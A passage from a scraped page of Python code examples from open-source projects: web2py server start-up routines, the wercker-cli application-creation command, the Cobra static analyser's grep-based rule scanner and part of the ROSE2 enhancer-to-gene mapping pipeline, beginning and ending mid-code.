    if hasattr(options, 'test') and options.test:
        test(options.test, verbose=options.verbose)
        return

    # ## if -S start interactive shell (also no cron)
    if options.shell:
        if not options.args is None:
            sys.argv[:] = options.args
        run(options.shell, plain=options.plain, bpython=options.bpython,
            import_models=options.import_models, startfile=options.run,
            cronjob=options.cronjob)
        return

    # ## if -C start cron run (extcron) and exit
    # ##    -K specifies optional apps list (overloading scheduler)
    if options.extcron:
        logger.debug('Starting extcron...')
        global_settings.web2py_crontype = 'external'
        if options.scheduler:   # -K
            apps = [app.strip() for app in options.scheduler.split(
                ',') if check_existent_app(options, app.strip())]
        else:
            apps = None
        extcron = newcron.extcron(options.folder, apps=apps)
        extcron.start()
        extcron.join()
        return

    # ## if -K
    if options.scheduler and not options.with_scheduler:
        try:
            start_schedulers(options)
        except KeyboardInterrupt:
            pass
        return

    # ## if -H cron is enabled in this *process*
    # ## if --softcron use softcron
    # ## use hardcron in all other cases
    if cron and options.runcron and options.softcron:
        print 'Using softcron (but this is not very efficient)'
        global_settings.web2py_crontype = 'soft'
    elif cron and options.runcron:
        logger.debug('Starting hardcron...')
        global_settings.web2py_crontype = 'hard'
        newcron.hardcron(options.folder).start()

    # ## if no password provided and havetk start Tk interface
    # ## or start interface if we want to put in taskbar (system tray)

    try:
        options.taskbar
    except:
        options.taskbar = False

    if options.taskbar and os.name != 'nt':
        print 'Error: taskbar not supported on this platform'
        sys.exit(1)

    root = None

    if not options.nogui and options.password=='<ask>':
        try:
            import Tkinter
            havetk = True
            try:
                root = Tkinter.Tk()
            except:
                pass
        except (ImportError, OSError):
            logger.warn(
                'GUI not available because Tk library is not installed')
            havetk = False
            options.nogui = True

    if root:
        root.focus_force()

        # Mac OS X - make the GUI window rise to the top
        if os.path.exists("/usr/bin/osascript"):
            applescript = """
tell application "System Events"
    set proc to first process whose unix id is %d
    set frontmost of proc to true
end tell
""" % (os.getpid())
            os.system("/usr/bin/osascript -e '%s'" % applescript)

        master = web2pyDialog(root, options)
        signal.signal(signal.SIGTERM, lambda a, b: master.quit())

        try:
            root.mainloop()
        except:
            master.quit()

        sys.exit()

    # ## if no tk and no password, ask for a password

    if not root and options.password == '<ask>':
        options.password = getpass.getpass('choose a password:')

    if not options.password and not options.nobanner:
        print 'no password, no admin interface'

    # ##-X (if no tk, the widget takes care of it himself)
    if not root and options.scheduler and options.with_scheduler:
        t = threading.Thread(target=start_schedulers, args=(options,))
        t.start()

    # ## start server

    # Use first interface IP and port if interfaces specified, since the
    # interfaces option overrides the IP (and related) options.
    if not options.interfaces:
        (ip, port) = (options.ip, int(options.port))
    else:
        first_if = options.interfaces[0]
        (ip, port) = first_if[0], first_if[1]

    # Check for non default value for ssl inputs
    if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
        proto = 'https'
    else:
        proto = 'http'

    url = get_url(ip, proto=proto, port=port)

    if not options.nobanner:
        message = '\nplease visit:\n\t%s\n' % url
        if sys.platform.startswith('win'):
            message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
        else:
            message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
        print message

    # enhance linecache.getline (used by debugger) to look at the source file
    # if the line was not found (under py2exe & when file was modified)
    import linecache
    py2exe_getline = linecache.getline
    def getline(filename, lineno, *args, **kwargs):
        line = py2exe_getline(filename, lineno, *args, **kwargs)
        if not line:
            try:
                f = open(filename, "r")
                try:
                    for i, line in enumerate(f):
                        if lineno == i + 1:
                            break
                    else:
                        line = None
                finally:
                    f.close()
            except (IOError, OSError):
                line = None
        return line
    linecache.getline = getline

    server = main.HttpServer(ip=ip,
                             port=port,
                             password=options.password,
                             pid_filename=options.pid_filename,
                             log_filename=options.log_filename,
                             profiler_dir=options.profiler_dir,
                             ssl_certificate=options.ssl_certificate,
                             ssl_private_key=options.ssl_private_key,
                             ssl_ca_certificate=options.ssl_ca_certificate,
                             min_threads=options.minthreads,
                             max_threads=options.maxthreads,
                             server_name=options.server_name,
                             request_queue_size=options.request_queue_size,
                             timeout=options.timeout,
                             socket_timeout=options.socket_timeout,
                             shutdown_timeout=options.shutdown_timeout,
                             path=options.folder,
                             interfaces=options.interfaces)

    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()
        try:
            t.join()
        except:
            pass
    logging.shutdown()

Example 17

Project: termite-visualizations
Source File: widget.py
View license
def start(cron=True):
    """ Start server  """

    # ## get command line arguments

    (options, args) = console()

    if not options.nobanner:
        print ProgramName
        print ProgramAuthor
        print ProgramVersion

    from dal import DRIVERS
    if not options.nobanner:
        print 'Database drivers available: %s' % ', '.join(DRIVERS)

    # ## if -L load options from options.config file
    if options.config:
        try:
            options2 = __import__(options.config, {}, {}, '')
        except Exception:
            try:
                # Jython doesn't like the extra stuff
                options2 = __import__(options.config)
            except Exception:
                print 'Cannot import config file [%s]' % options.config
                sys.exit(1)
        for key in dir(options2):
            if hasattr(options, key):
                setattr(options, key, getattr(options2, key))

    logfile0 = os.path.join('extras','examples','logging.example.conf')
    if not os.path.exists('logging.conf') and os.path.exists(logfile0):
        import shutil
        sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
        shutil.copyfile('logging.example.conf', logfile0)
        sys.stdout.write("OK\n")

    # ## if -T run doctests (no cron)
    if hasattr(options, 'test') and options.test:
        test(options.test, verbose=options.verbose)
        return

    # ## if -S start interactive shell (also no cron)
    if options.shell:
        if not options.args is None:
            sys.argv[:] = options.args
        run(options.shell, plain=options.plain, bpython=options.bpython,
            import_models=options.import_models, startfile=options.run,
            cronjob=options.cronjob)
        return

    # ## if -C start cron run (extcron) and exit
    # ##    -K specifies optional apps list (overloading scheduler)
    if options.extcron:
        logger.debug('Starting extcron...')
        global_settings.web2py_crontype = 'external'
        if options.scheduler:   # -K
            apps = [app.strip() for app in options.scheduler.split(
                ',') if check_existent_app(options, app.strip())]
        else:
            apps = None
        extcron = newcron.extcron(options.folder, apps=apps)
        extcron.start()
        extcron.join()
        return

    # ## if -K
    if options.scheduler and not options.with_scheduler:
        try:
            start_schedulers(options)
        except KeyboardInterrupt:
            pass
        return

    # ## if -H cron is enabled in this *process*
    # ## if --softcron use softcron
    # ## use hardcron in all other cases
    if cron and options.runcron and options.softcron:
        print 'Using softcron (but this is not very efficient)'
        global_settings.web2py_crontype = 'soft'
    elif cron and options.runcron:
        logger.debug('Starting hardcron...')
        global_settings.web2py_crontype = 'hard'
        newcron.hardcron(options.folder).start()

    # ## if no password provided and havetk start Tk interface
    # ## or start interface if we want to put in taskbar (system tray)

    try:
        options.taskbar
    except:
        options.taskbar = False

    if options.taskbar and os.name != 'nt':
        print 'Error: taskbar not supported on this platform'
        sys.exit(1)

    root = None

    if not options.nogui and options.password=='<ask>':
        try:
            import Tkinter
            havetk = True
            try:
                root = Tkinter.Tk()
            except:
                pass
        except (ImportError, OSError):
            logger.warn(
                'GUI not available because Tk library is not installed')
            havetk = False
            options.nogui = True

    if root:
        root.focus_force()

        # Mac OS X - make the GUI window rise to the top
        if os.path.exists("/usr/bin/osascript"):
            applescript = """
tell application "System Events"
    set proc to first process whose unix id is %d
    set frontmost of proc to true
end tell
""" % (os.getpid())
            os.system("/usr/bin/osascript -e '%s'" % applescript)

        master = web2pyDialog(root, options)
        signal.signal(signal.SIGTERM, lambda a, b: master.quit())

        try:
            root.mainloop()
        except:
            master.quit()

        sys.exit()

    # ## if no tk and no password, ask for a password

    if not root and options.password == '<ask>':
        options.password = getpass.getpass('choose a password:')

    if not options.password and not options.nobanner:
        print 'no password, no admin interface'

    # ##-X (if no tk, the widget takes care of it himself)
    if not root and options.scheduler and options.with_scheduler:
        t = threading.Thread(target=start_schedulers, args=(options,))
        t.start()

    # ## start server

    # Use first interface IP and port if interfaces specified, since the
    # interfaces option overrides the IP (and related) options.
    if not options.interfaces:
        (ip, port) = (options.ip, int(options.port))
    else:
        first_if = options.interfaces[0]
        (ip, port) = first_if[0], first_if[1]

    # Check for non default value for ssl inputs
    if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
        proto = 'https'
    else:
        proto = 'http'

    url = get_url(ip, proto=proto, port=port)

    if not options.nobanner:
        print 'please visit:'
        print '\t', url
        print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()

    # enhance linecache.getline (used by debugger) to look at the source file
    # if the line was not found (under py2exe & when file was modified)
    import linecache
    py2exe_getline = linecache.getline
    def getline(filename, lineno, *args, **kwargs):
        line = py2exe_getline(filename, lineno, *args, **kwargs)
        if not line:
            try:
                f = open(filename, "r")
                try:
                    for i, line in enumerate(f):
                        if lineno == i + 1:
                            break
                    else:
                        line = None
                finally:
                    f.close()
            except (IOError, OSError):
                line = None
        return line
    linecache.getline = getline

    server = main.HttpServer(ip=ip,
                             port=port,
                             password=options.password,
                             pid_filename=options.pid_filename,
                             log_filename=options.log_filename,
                             profiler_dir=options.profiler_dir,
                             ssl_certificate=options.ssl_certificate,
                             ssl_private_key=options.ssl_private_key,
                             ssl_ca_certificate=options.ssl_ca_certificate,
                             min_threads=options.minthreads,
                             max_threads=options.maxthreads,
                             server_name=options.server_name,
                             request_queue_size=options.request_queue_size,
                             timeout=options.timeout,
                             socket_timeout=options.socket_timeout,
                             shutdown_timeout=options.shutdown_timeout,
                             path=options.folder,
                             interfaces=options.interfaces)

    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()
        try:
            t.join()
        except:
            pass
    logging.shutdown()

Example 18

Project: wercker-cli
Source File: create.py
View license
@login_required
def create(path='.', valid_token=None):
    if not valid_token:
        raise ValueError("A valid token is required!")

    term = get_term()

    if get_value(VALUE_PROJECT_ID, print_warnings=False):
        puts("A .wercker file was found.")
        run_create = prompt.yn(
            "Are you sure you want to run `wercker create`?",
            default="n")

        if run_create is False:
            puts("Aborting.")
            return
        else:
            puts("")

    if project_link(
        valid_token=valid_token,
        puts_result=False,
        auto_link=False
    ):
        puts("A matching application was found on wercker.")
        use_link = prompt.yn("Do you want to run 'wercker link' instead of\
 `wercker create`?")

        puts("")

        if use_link is True:
            project_link(valid_token=valid_token)
            return

    path = find_git_root(path)

    if path:
        options = get_remote_options(path)

        heroku_options = filter_heroku_sources(options)
    else:
        options = []
        heroku_options = []

    if not path:
        return False

    puts('''About to create an application on wercker.

This consists of the following steps:
1. Configure application
2. Setup keys
3. Add a deploy target ({heroku_options} heroku targets detected)
4. Trigger initial build'''.format(
        wercker_url=get_value(VALUE_WERCKER_URL),
        heroku_options=len(heroku_options))
    )

    if not path:
        puts(
            term.red("Error:") +
            " Could not find a repository." +
            " wercker create requires a git repository. Create/clone a\
 repository first."
        )
        return

    options = [o for o in options if o not in heroku_options]

    options = [o for o in options if o.priority > 1]

    count = len(options)
    puts('''
Step ''' + term.white('1') + '''. Configure application
-------------
''')
    puts(
        "%s repository location(s) found...\n"
        % term.bold(str(count))
    )

    url = pick_url(options)
    url = convert_to_url(url)

    source = get_preferred_source_type(url)
    puts("\n%s repository detected..." % source)
    puts("Selected repository url is %s\n" % url)

    client = Client()

    code, profile = client.get_profile(valid_token)

    source_type = get_source_type(url)

    if source_type == SOURCE_BITBUCKET:
        if profile.get('hasBitbucketToken', False) is False:
            puts("No Bitbucket account linked with your profile. Wercker uses\
 this connection to linkup some events for your repository on Bitbucket to our\
  service.")
            provider_url = get_value(
                VALUE_WERCKER_URL
            ) + '/provider/add/cli/bitbucket'

            puts("Launching {url} to start linking.".format(
                url=provider_url
            ))
            from time import sleep

            sleep(5)
            import webbrowser

            webbrowser.open(provider_url)

            raw_input("Press enter to continue...")
    elif source_type == SOURCE_GITHUB:
        if profile.get('hasGithubToken', False) is False:
            puts("No GitHub account linked with your profile. Wercker uses\
 this connection to linkup some events for your repository on GitHub to our\
 service.")
            provider_url = get_value(
                VALUE_WERCKER_URL
            ) + '/provider/add/cli/github'

            puts("Launching {url} to start linking.".format(
                url=provider_url
            ))

            from time import sleep

            sleep(5)

            import webbrowser

            webbrowser.open(provider_url)

            raw_input("Press enter to continue...")
    username = get_username(url)
    project = get_project(url)

    puts('''
Step {t.white}2{t.normal}.
-------------
In order to clone the repository on wercker, an ssh key is needed. A new/unique
key can be generated for each repository. There 3 ways of using ssh keys on
wercker:

{t.green}1. Automatically add a deploy key [recommended]{t.normal}
2. Use the checkout key, wercker uses for public projects.
3. Let wercker generate a key, but allow add it manually to github/bitbucket.
(needed when using git submodules)

For more information on this see: http://etc...
'''.format(t=term))
    key_method = None
    while(True):
        result = prompt.get_value_with_default(
            "Options:",
            '1'
        )

        valid_values = [str(i + 1) for i in range(3)]

        if result in valid_values:
            key_method = valid_values.index(result)
            break
        else:
            puts(term.red("warning: ") + " invalid build selected.")

    checkout_key_id = None
    checkout_key_publicKey = None

    if(key_method != 1):
        puts('''Retrieving a new ssh-key.''')
        status, response = client.create_checkout_key()
        puts("done.")

        if status == 200:
            checkout_key_id = response['id']
            checkout_key_publicKey = response['publicKey']

            if key_method == 0:
                puts('Adding deploy key to repository:')
                status, response = client.link_checkout_key(valid_token,
                                                            checkout_key_id,
                                                            username,
                                                            project,
                                                            source_type)
                if status != 200:
                    puts(term.red("Error:") +
                         " uanble to add key to repository.")
                    sys.exit(1)
            elif key_method == 2:
                profile_username = profile.get('username')
                status, response = client.get_profile_detailed(
                    valid_token,
                    profile_username)

                username = response[source_type + 'Username']
                url = None
                if source_type == SOURCE_GITHUB:
                    url = "https://github.com/settings/ssh"
                elif source_type == SOURCE_BITBUCKET:
                    url = "http://bitbucket.org/account/user/{username}/\
ssh-keys/"

                if status == 200:
                    formatted_key = "\n".join(
                        textwrap.wrap(checkout_key_publicKey))

                    puts('''Please add the following public key:
    {publicKey}

    You can add the key here: {url}\n'''.format(publicKey=formatted_key,
                                                url=url.format(
                                                    username=username)))
                    raw_input("Press enter to continue...")
                else:
                    puts(term.red("Error:") +
                         " unable to load wercker profile information.")
                    sys.exit(1)
        else:
            puts(term.red("Error:") + 'unable to retrieve an ssh key.')
            sys.exit(1)

    puts("Creating a new application")
    status, response = client.create_project(
        valid_token,
        username,
        project,
        source,
        checkout_key_id,
    )

    if response['success']:

        puts("done.\n")
        set_value(VALUE_PROJECT_ID, response['data']['id'])

        puts("In the root of this repository a .wercker file has been created\
 which enables the link between the source code and wercker.\n")

        site_url = None

        if source_type == SOURCE_GITHUB:

            site_url = "https://github.com/" + \
                username + \
                "/" + \
                project

        elif source_type == SOURCE_BITBUCKET:

            site_url = "https://bitbucket.org/" + \
                username + \
                "/" + \
                project

        puts('''
Step ''' + term.white('3') + '''.
-------------
''')

        target_options = heroku_options

        nr_targets = len(target_options)
        puts("%s automatic supported target(s) found." % str(nr_targets))

        if nr_targets:
            target_add(valid_token=valid_token)

        puts('''
Step ''' + term.white('4') + '''.
-------------
''')

        project_build(valid_token=valid_token)

        puts('''
Done.
-------------

You are all set up to for using wercker. You can trigger new builds by
committing and pushing your latest changes.

Happy coding!''')
    else:
        puts(
            term.red("Error: ") +
            "Unable to create project. \n\nResponse: %s\n" %
            (response.get('errorMessage'))
        )
        puts('''
Note: only repository where the wercker's user has permissions on can be added.
This is because some event hooks for wercker need to be registered on the
repository. If you want to test a public repository and don't have permissions
 on it: fork it. You can add the forked repository to wercker''')

Example 19

Project: cobra
Source File: static.py
View license
    def analyse(self):
        if self.directory is None:
            logging.critical("Please set directory")
            sys.exit()
        logging.info('Start code static analyse...')

        d = directory.Directory(self.directory)
        files = d.collect_files(self.task_id)
        logging.info('Scan Files: {0}, Total Time: {1}s'.format(files['file_nums'], files['collect_time']))

        ext_language = {
            # Image
            '.jpg': 'image',
            '.png': 'image',
            '.bmp': 'image',
            '.gif': 'image',
            '.ico': 'image',
            '.cur': 'image',
            # Font
            '.eot': 'font',
            '.otf': 'font',
            '.svg': 'font',
            '.ttf': 'font',
            '.woff': 'font',
            # CSS
            '.css': 'css',
            '.less': 'css',
            '.scss': 'css',
            '.styl': 'css',
            # Media
            '.mp3': 'media',
            '.swf': 'media',
            # Execute
            '.exe': 'execute',
            '.sh': 'execute',
            '.dll': 'execute',
            '.so': 'execute',
            '.bat': 'execute',
            '.pl': 'execute',
            # Edit
            '.swp': 'tmp',
            # Cert
            '.crt': 'cert',
            # Text
            '.txt': 'text',
            '.csv': 'text',
            '.md': 'markdown',
            # Backup
            '.zip': 'backup',
            '.bak': 'backup',
            '.tar': 'backup',
            '.rar': 'backup',
            '.tar.gz': 'backup',
            '.db': 'backup',
            # Config
            '.xml': 'config',
            '.yml': 'config',
            '.spf': 'config',
            '.iml': 'config',
            '.manifest': 'config',
            # Source
            '.psd': 'source',
            '.as': 'source',
            # Log
            '.log': 'log',
            # Template
            '.template': 'template',
            '.tpl': 'template',
        }
        for ext in files:
            if ext in ext_language:
                logging.info('{0} - {1}'.format(ext, files[ext]))
                continue
            else:
                logging.info(ext)

        languages = CobraLanguages.query.all()

        rules = CobraRules.query.filter_by(status=1).all()
        extensions = None
        # `grep` (`ggrep` on Mac)
        grep = '/bin/grep'
        # `find` (`gfind` on Mac)
        find = '/bin/find'
        if 'darwin' == sys.platform:
            ggrep = ''
            gfind = ''
            for root, dir_names, file_names in os.walk('/usr/local/Cellar/grep'):
                for filename in file_names:
                    if 'ggrep' == filename or 'grep' == filename:
                        ggrep = os.path.join(root, filename)
            for root, dir_names, file_names in os.walk('/usr/local/Cellar/findutils'):
                for filename in file_names:
                    if 'gfind' == filename:
                        gfind = os.path.join(root, filename)
            if ggrep == '':
                logging.critical("brew install ggrep pleases!")
                sys.exit(0)
            else:
                grep = ggrep
            if gfind == '':
                logging.critical("brew install findutils pleases!")
                sys.exit(0)
            else:
                find = gfind

        """
        all vulnerabilities
        vulnerabilities_all[vuln_id] = {'name': 'vuln_name', 'third_v_id': 'third_v_id'}
        """
        vulnerabilities_all = {}
        vulnerabilities = CobraVuls.query.all()
        for v in vulnerabilities:
            vulnerabilities_all[v.id] = {
                'name': v.name,
                'third_v_id': v.third_v_id
            }

        for rule in rules:
            rule.regex_location = rule.regex_location.strip()
            rule.regex_repair = rule.regex_repair.strip()
            logging.info('------------------\r\nScan rule id: {0} {1} {2}'.format(self.project_id, rule.id, rule.description))
            # Filters
            for language in languages:
                if language.id == rule.language:
                    extensions = language.extensions.split('|')
            if extensions is None:
                logging.critical("Rule Language Error")
                sys.exit(0)

            # White list
            white_list = []
            ws = CobraWhiteList.query.filter_by(project_id=self.project_id, rule_id=rule.id, status=1).all()
            if ws is not None:
                for w in ws:
                    white_list.append(w.path)

            try:
                if rule.regex_location == "":
                    filters = []
                    for index, e in enumerate(extensions):
                        if index > 1:
                            filters.append('-o')
                        filters.append('-name')
                        filters.append('*' + e)
                    # Find Special Ext Files
                    param = [find, self.directory, "-type", "f"] + filters
                else:
                    filters = []
                    for e in extensions:
                        filters.append('--include=*' + e)

                    # explode dirs
                    explode_dirs = ['.svn', '.cvs', '.hg', '.git', '.bzr']
                    for explode_dir in explode_dirs:
                        filters.append('--exclude-dir={0}'.format(explode_dir))

                    # -n Show Line number / -r Recursive / -P Perl regular expression
                    param = [grep, "-n", "-r", "-P"] + filters + [rule.regex_location, self.directory]

                logging.debug(' '.join(param))
                p = subprocess.Popen(param, stdout=subprocess.PIPE)
                result = p.communicate()

                # Exists result
                if len(result[0]):
                    lines = str(result[0]).strip().split("\n")
                    for line in lines:
                        line = line.strip()
                        if line == '':
                            continue
                        # 处理grep结果
                        if ':' in line:
                            line_split = line.split(':', 1)
                            file_path = line_split[0].strip()
                            code_content = line_split[1].split(':', 1)[1].strip()
                            line_number = line_split[1].split(':', 1)[0].strip()
                        else:
                            # 搜索文件
                            file_path = line
                            code_content = ''
                            line_number = 0
                        # 核心规则校验
                        result_info = {
                            'task_id': self.task_id,
                            'project_id': self.project_id,
                            'project_directory': self.directory,
                            'rule_id': rule.id,
                            'file_path': file_path,
                            'line_number': line_number,
                            'code_content': code_content,
                            'third_party_vulnerabilities_name': vulnerabilities_all[rule.vul_id]['name'],
                            'third_party_vulnerabilities_type': vulnerabilities_all[rule.vul_id]['third_v_id']
                        }
                        ret_status, ret_result = Core(result_info, rule, self.project_name, white_list).scan()
                        if ret_status is False:
                            logging.info("扫描 R: False {0}".format(ret_result))
                            continue

                else:
                    logging.info('Not Found')

            except Exception as e:
                print(traceback.print_exc())
                logging.critical('Error calling grep: ' + str(e))

        # Set End Time For Task
        t = CobraTaskInfo.query.filter_by(id=self.task_id).first()
        t.status = 2
        t.file_count = files['file_nums']
        t.time_end = int(time.time())
        t.time_consume = t.time_end - t.time_start
        t.updated_at = time.strftime('%Y-%m-%d %X', time.localtime())
        try:
            db.session.add(t)
            db.session.commit()
        except Exception as e:
            logging.critical("Set start time failed:" + e.message)
        logging.info("Scan Done")

Example 20

Project: pipeline
Source File: ROSE2_geneMapper.py
View license
def mapEnhancerToGeneTop(rankByBamFile, controlBamFile, genome, annotFile, enhancerFile, transcribedFile='', uniqueGenes=True, searchWindow=50000, noFormatTable=False):
    '''
    maps genes to enhancers. if uniqueGenes, reduces to gene name only. Otherwise, gives for each refseq
    '''
    startDict = utils.makeStartDict(annotFile)
    enhancerName = enhancerFile.split('/')[-1].split('.')[0]
    enhancerTable = utils.parseTable(enhancerFile, '\t')

    # internal parameter for debugging
    byRefseq = False

    if len(transcribedFile) > 0:
        transcribedTable = utils.parseTable(transcribedFile, '\t')
        transcribedGenes = [line[1] for line in transcribedTable]
    else:
        transcribedGenes = startDict.keys()

    print('MAKING TRANSCRIPT COLLECTION')
    transcribedCollection = utils.makeTranscriptCollection(
        annotFile, 0, 0, 500, transcribedGenes)

    print('MAKING TSS COLLECTION')
    tssLoci = []
    for geneID in transcribedGenes:
        tssLoci.append(utils.makeTSSLocus(geneID, startDict, 0, 0))

    # this turns the tssLoci list into a LocusCollection
    # 50 is the internal parameter for LocusCollection and doesn't really
    # matter
    tssCollection = utils.LocusCollection(tssLoci, 50)

    geneDict = {'overlapping': defaultdict(
        list), 'proximal': defaultdict(list)}

    # dictionaries to hold ranks and superstatus of gene nearby enhancers
    rankDict = defaultdict(list)
    superDict = defaultdict(list)

    # list of all genes that appear in this analysis
    overallGeneList = []

    # find the damn header
    for line in enhancerTable:
        if line[0][0] == '#':
            continue
        else:
            header = line
            break

    if noFormatTable:
        # set up the output tables
        # first by enhancer
        enhancerToGeneTable = [
            header + ['OVERLAP_GENES', 'PROXIMAL_GENES', 'CLOSEST_GENE']]

    else:
        # set up the output tables
        # first by enhancer
        enhancerToGeneTable = [
            header[0:9] + ['OVERLAP_GENES', 'PROXIMAL_GENES', 'CLOSEST_GENE'] + header[-2:]]

        # next by gene
        geneToEnhancerTable = [
            ['GENE_NAME', 'REFSEQ_ID', 'PROXIMAL_ENHANCERS']]

    # next make the gene to enhancer table
    geneToEnhancerTable = [
        ['GENE_NAME', 'REFSEQ_ID', 'PROXIMAL_ENHANCERS', 'ENHANCER_RANKS', 'IS_SUPER', 'ENHANCER_SIGNAL']]

    for line in enhancerTable:
        if line[0][0] == '#' or line[0][0] == 'R':
            continue

        enhancerString = '%s:%s-%s' % (line[1], line[2], line[3])

        enhancerLocus = utils.Locus(line[1], line[2], line[3], '.', line[0])

        # overlapping genes are transcribed genes whose transcript is directly
        # in the stitchedLocus
        overlappingLoci = transcribedCollection.getOverlap(
            enhancerLocus, 'both')
        overlappingGenes = []
        for overlapLocus in overlappingLoci:
            overlappingGenes.append(overlapLocus.ID())

        # proximalGenes are transcribed genes where the tss is within 50kb of
        # the boundary of the stitched loci
        proximalLoci = tssCollection.getOverlap(
            utils.makeSearchLocus(enhancerLocus, searchWindow, searchWindow), 'both')
        proximalGenes = []
        for proxLocus in proximalLoci:
            proximalGenes.append(proxLocus.ID())

        distalLoci = tssCollection.getOverlap(
            utils.makeSearchLocus(enhancerLocus, 1000000, 1000000), 'both')
        distalGenes = []
        for proxLocus in distalLoci:
            distalGenes.append(proxLocus.ID())

        overlappingGenes = utils.uniquify(overlappingGenes)
        proximalGenes = utils.uniquify(proximalGenes)
        distalGenes = utils.uniquify(distalGenes)
        allEnhancerGenes = overlappingGenes + proximalGenes + distalGenes
        # these checks make sure each gene list is unique.
        # technically it is possible for a gene to be overlapping, but not proximal since the
        # gene could be longer than the 50kb window, but we'll let that slide
        # here
        for refID in overlappingGenes:
            if proximalGenes.count(refID) == 1:
                proximalGenes.remove(refID)

        for refID in proximalGenes:
            if distalGenes.count(refID) == 1:
                distalGenes.remove(refID)

        # Now find the closest gene
        if len(allEnhancerGenes) == 0:
            closestGene = ''
        else:
            # get enhancerCenter
            enhancerCenter = (int(line[2]) + int(line[3])) / 2

            # get absolute distance to enhancer center
            distList = [abs(enhancerCenter - startDict[geneID]['start'][0])
                        for geneID in allEnhancerGenes]
            # get the ID and convert to name
            closestGene = startDict[
                allEnhancerGenes[distList.index(min(distList))]]['name']

        # NOW WRITE THE ROW FOR THE ENHANCER TABLE
        if noFormatTable:

            newEnhancerLine = list(line)
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in overlappingGenes]), ','))
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in proximalGenes]), ','))
            newEnhancerLine.append(closestGene)

        else:
            newEnhancerLine = line[0:9]
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in overlappingGenes]), ','))
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in proximalGenes]), ','))
            newEnhancerLine.append(closestGene)
            newEnhancerLine += line[-2:]

        enhancerToGeneTable.append(newEnhancerLine)
        # Now grab all overlapping and proximal genes for the gene ordered
        # table

        overallGeneList += overlappingGenes
        for refID in overlappingGenes:
            geneDict['overlapping'][refID].append(enhancerString)
            rankDict[refID].append(int(line[-2]))
            superDict[refID].append(int(line[-1]))

        overallGeneList += proximalGenes
        for refID in proximalGenes:
            geneDict['proximal'][refID].append(enhancerString)
            rankDict[refID].append(int(line[-2]))
            superDict[refID].append(int(line[-1]))

    # End loop through
    # Make table by gene
    print('MAKING ENHANCER ASSOCIATED GENE TSS COLLECTION')
    overallGeneList = utils.uniquify(overallGeneList)

    #get the chromLists from the various bams here
    cmd = 'samtools idxstats %s' % (rankByBamFile)
    idxStats = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
    idxStats= idxStats.communicate()
    bamChromList = [line.split('\t')[0] for line in idxStats[0].split('\n')[0:-2]]
    
    if len(controlBamFile) > 0:
        cmd = 'samtools idxstats %s' % (controlBamFile)
        idxStats = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
        idxStats= idxStats.communicate()
        bamChromListControl = [line.split('\t')[0] for line in idxStats[0].split('\n')[0:-2]]
        bamChromList = [chrom for chrom in bamChromList if bamChromListControl.count(chrom) != 0]



    #now make sure no genes have a bad chrom 
    overallGeneList = [gene for gene in overallGeneList if bamChromList.count(startDict[gene]['chr']) != 0]

    
    #now make an enhancer collection of all transcripts    
    enhancerGeneCollection = utils.makeTranscriptCollection(
        annotFile, 5000, 5000, 500, overallGeneList)

    enhancerGeneGFF = utils.locusCollectionToGFF(enhancerGeneCollection)

    # dump the gff to file
    enhancerFolder = utils.getParentFolder(enhancerFile)
    gffRootName = "%s_TSS_ENHANCER_GENES_-5000_+5000" % (genome)
    enhancerGeneGFFFile = "%s%s_%s.gff" % (enhancerFolder, enhancerName,gffRootName)
    utils.unParseTable(enhancerGeneGFF, enhancerGeneGFFFile, '\t')

    # now we need to run bamToGFF

    # Try to use the bamliquidatior_path.py script on cluster, otherwise, failover to local (in path), otherwise fail.
    bamliquidator_path = 'bamliquidator_batch'


    print('MAPPING SIGNAL AT ENHANCER ASSOCIATED GENE TSS')
    # map density at genes in the +/- 5kb tss region
    # first on the rankBy bam
    bamName = rankByBamFile.split('/')[-1]
    mappedRankByFolder = "%s%s_%s_%s/" % (enhancerFolder, enhancerName,gffRootName, bamName)
    mappedRankByFile = "%s%s_%s_%s/matrix.txt" % (enhancerFolder,enhancerName, gffRootName, bamName)
    cmd = bamliquidator_path + ' --sense . -e 200 --match_bamToGFF -r %s -o %s %s' % (enhancerGeneGFFFile, mappedRankByFolder,rankByBamFile)
    print("Mapping rankby bam %s" % (rankByBamFile))
    print(cmd)
    os.system(cmd)

    #check for completion
    if utils.checkOutput(mappedRankByFile,0.2,5):
        print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (enhancerGeneGFFFile, rankByBamFile))
    else:
        print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (enhancerGeneGFFFile, rankByBamFile))
        sys.exit()

    # next on the control bam if it exists
    if len(controlBamFile) > 0:
        controlName = controlBamFile.split('/')[-1]
        mappedControlFolder = "%s%s_%s_%s/" % (
            enhancerFolder, enhancerName,gffRootName, controlName)
        mappedControlFile = "%s%s_%s_%s/matrix.txt" % (
            enhancerFolder, enhancerName,gffRootName, controlName)
        cmd = bamliquidator_path + ' --sense . -e 200 --match_bamToGFF -r %s -o %s %s' % (enhancerGeneGFFFile, mappedControlFolder,controlBamFile)
        print("Mapping control bam %s" % (controlBamFile))
        print(cmd)
        os.system(cmd)

        #check for completion
        if utils.checkOutput(mappedControlFile,0.2,5):
            print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (enhancerGeneGFFFile, controlBamFile))
        else:
            print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (enhancerGeneGFFFile, controlBamFile))
            sys.exit()

    # now get the appropriate output files
    if len(controlBamFile) > 0:
        print("CHECKING FOR MAPPED OUTPUT AT %s AND %s" %
              (mappedRankByFile, mappedControlFile))
        if utils.checkOutput(mappedRankByFile, 1, 1) and utils.checkOutput(mappedControlFile, 1, 1):
            print('MAKING ENHANCER ASSOCIATED GENE TSS SIGNAL DICTIONARIES')
            signalDict = makeSignalDict(mappedRankByFile, mappedControlFile)
        else:
